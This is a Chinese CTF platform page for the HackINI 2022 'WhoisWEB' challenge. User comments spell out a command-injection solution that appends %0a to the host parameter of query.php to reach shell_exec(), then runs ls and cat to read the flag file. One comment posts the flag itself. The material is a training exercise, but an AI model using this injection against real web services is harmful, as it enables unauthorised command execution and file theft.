WhoisWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 751
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
评论
MoCaser 1月前

不懂的建议花金币看看wp

回复 0

000ooo 4月前

①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1
zzz666 2月前

@cyffk 空格和换行会被url编码

回复 0

cyffk 4月前

为什么%不会被过滤?

回复 0

Zhumeng 4月前

查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码

回复 1

admin9101 6月前

http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

MOCHAOLIN 7月前

(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf

回复 0

wj834722134 8月前

host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内

回复 0
xwWx 2月前

@TOMCAT336699 x0a 是换行的话大概是 正则表达式只匹配换行之前的字符串

回复 0

TOMCAT336699 3月前

您弄明白了没有,你这个问题,我没找出答案来,谢谢

回复 0

Tao23 10月前

query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

to5ny 11月前

/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

xzs297995 11月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 1

xiaoxiao972521 12月前

/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

WriteUp

image
hopeinhand

1 金币

评分(1)

解题动态

18897888104 攻破了该题 20小时前
Bolzman 攻破了该题 2天前
xiaoyaofawaimg 攻破了该题 2天前
slience 攻破了该题 2天前
kfdwty 攻破了该题 4天前
liuguowang75 攻破了该题 4天前
zzcy 攻破了该题 8天前
leonleonleon 攻破了该题 11天前
forces 攻破了该题 15天前
brant 攻破了该题 15天前
2845985939 攻破了该题 15天前
蟹堡王第一厨师长 攻破了该题 15天前
rudeng 攻破了该题 15天前
huangxiyuan 攻破了该题 17天前
AnnW 攻破了该题 17天前
卡哇呀石榴 攻破了该题 18天前
fatcat 攻破了该题 18天前
854396873 攻破了该题 19天前
An1147 攻破了该题 19天前
yangyangbao 攻破了该题 22天前
问题反馈